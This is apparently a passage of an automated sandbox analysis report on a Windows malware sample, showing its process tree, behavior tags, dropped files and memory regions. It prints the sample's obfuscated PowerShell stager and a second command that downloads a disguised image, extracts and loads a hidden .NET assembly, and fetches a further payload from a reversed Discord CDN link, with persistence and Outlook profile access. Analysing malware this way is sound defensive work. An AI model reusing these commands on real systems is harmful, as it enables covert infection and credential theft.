⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bi⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄cwBl⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄BD⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄bwBh⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQBk⼞ ⋄ ⍃ ⨞ ❄EE⼞ ⋄ ⍃ ⨞ ❄cwBz⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bQBi⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄eQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄UgBl⼞ ⋄ ⍃ ⨞ ❄GY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bg⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄EE⼞ ⋄ ⍃ ⨞ ❄cwBz⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bQBi⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄eQBd⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄OgBM⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bj⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄eQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄cw⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄B0⼞ ⋄ ⍃ ⨞ ❄Hk⼞ ⋄ ⍃ ⨞ ❄c⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bv⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄QQBz⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄B5⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄RwBl⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄V⼞ ⋄ ⍃ ⨞ ❄B5⼞ ⋄ ⍃ ⨞ ❄H⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bu⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄aQBi⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄SQBP⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄S⼞ ⋄ ⍃ ⨞ ❄Bv⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄ZQB0⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄bwBk⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄B5⼞ ⋄ ⍃ ⨞ ❄H⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄Ec⼞ ⋄ ⍃ ⨞ ❄ZQB0⼞ ⋄ ⍃ ⨞ ❄E0⼞ ⋄ ⍃ ⨞ ❄ZQB0⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄bwBk⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄JwBW⼞ ⋄ ⍃ ⨞ ❄EE⼞ ⋄ ⍃ ⨞ ❄SQ⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄LgBJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄dgBv⼞ ⋄ ⍃ ⨞ ❄Gs⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄bgB1⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄WwBv⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄agBl⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄F0⼞ ⋄ ⍃ ⨞ ❄XQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄m⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄MQBi⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄ZgBk⼞ ⋄ ⍃ ⨞ ❄Dg⼞ ⋄ ⍃ ⨞ ❄M⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄Mg⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄Dc⼞ ⋄ ⍃ ⨞ ❄MwBk⼞ ⋄ ⍃ ⨞ ❄GY⼞ ⋄ ⍃ ⨞ ❄Yg⼞ ⋄ ⍃ ⨞ ❄1⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄3⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄MQBi⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Yw⼞ ⋄ ⍃ ⨞ ❄1⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄MQBj⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄NQ⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄NwBh⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄NQ⼞ ⋄ ⍃ ⨞ ❄w⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄Bm⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄OQ⼞ ⋄ ⍃ ⨞ ❄3⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄z⼞ ⋄ ⍃ ⨞ ❄GY⼞ ⋄ ⍃ ⨞ ❄Yw⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄NgBl⼞ ⋄ ⍃ ⨞ ❄DU⼞ ⋄ ⍃ ⨞ ❄PQBt⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄JgBj⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄Bj⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Yw⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄PQBz⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄JgBj⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄NQ⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄PQB4⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄PwB0⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄Eo⼞ ⋄ ⍃ ⨞ ❄Sg⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄O⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄1⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄MQ⼞ ⋄ ⍃ ⨞ ❄w⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄z⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄y⼞ ⋄ ⍃ ⨞ ❄Dg⼞ ⋄ ⍃ ⨞ ❄Nw⼞ ⋄ ⍃ ⨞ ❄y⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄Lw⼞ ⋄ ⍃ ⨞ ❄5⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄Dc⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄z⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄DU⼞ ⋄ ⍃ ⨞ ❄OQ⼞ ⋄ ⍃ ⨞ ❄3⼞ ⋄ ⍃ ⨞ ❄Dc⼞ ⋄ ⍃ ⨞ ❄Mg⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄YwBh⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄bQBv⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄LgBw⼞ ⋄ ⍃ ⨞ ❄H⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄bwBj⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄aQBk⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄Lw⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄cwBw⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bo⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄JwBD⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄X⼞ ⋄ ⍃ ⨞ ❄BQ⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄bwBn⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄YQBt⼞ ⋄ ⍃ ⨞ ❄EQ⼞ ⋄ ⍃ ⨞ ❄YQB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄X⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄L⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄cgBl⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄By⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄BV⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄aQBs⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄L⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQBz⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄HY⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⼞ ⋄ ⍃ ⨞ ❄','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2360
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&91bcfd804a2673dfb54374d1c1b4c541cc5117ac50a4f497b66433fc4b66e6e5=mh&c14cec66=si&c9510d66=xe?txt.JJ/1319851109630428721/9941734063661597721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'terrestre','InstallUtil','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3200
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\terrestre.js"
          4⤵
            PID:1136
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            4⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:624

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icqgfhde.g4z.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/624-33-0x00000000068B0000-0x0000000006A72000-memory.dmp

      Filesize

      1.8MB

    • memory/624-24-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/624-31-0x0000000005A30000-0x0000000005FD4000-memory.dmp

      Filesize

      5.6MB

    • memory/624-32-0x0000000005480000-0x000000000551C000-memory.dmp

      Filesize

      624KB

    • memory/624-34-0x0000000006750000-0x00000000067A0000-memory.dmp

      Filesize

      320KB

    • memory/624-35-0x0000000006A80000-0x0000000006B12000-memory.dmp

      Filesize

      584KB

    • memory/624-36-0x0000000006870000-0x000000000687A000-memory.dmp

      Filesize

      40KB

    • memory/2360-12-0x00007FFF2E7C0000-0x00007FFF2F281000-memory.dmp

      Filesize

      10.8MB

    • memory/2360-11-0x00007FFF2E7C0000-0x00007FFF2F281000-memory.dmp

      Filesize

      10.8MB

    • memory/2360-1-0x0000013552E80000-0x0000013552EA2000-memory.dmp

      Filesize

      136KB

    • memory/2360-30-0x00007FFF2E7C0000-0x00007FFF2F281000-memory.dmp

      Filesize

      10.8MB

    • memory/2360-0-0x00007FFF2E7C3000-0x00007FFF2E7C5000-memory.dmp

      Filesize

      8KB

    • memory/3200-22-0x0000024357140000-0x0000024357262000-memory.dmp

      Filesize

      1.1MB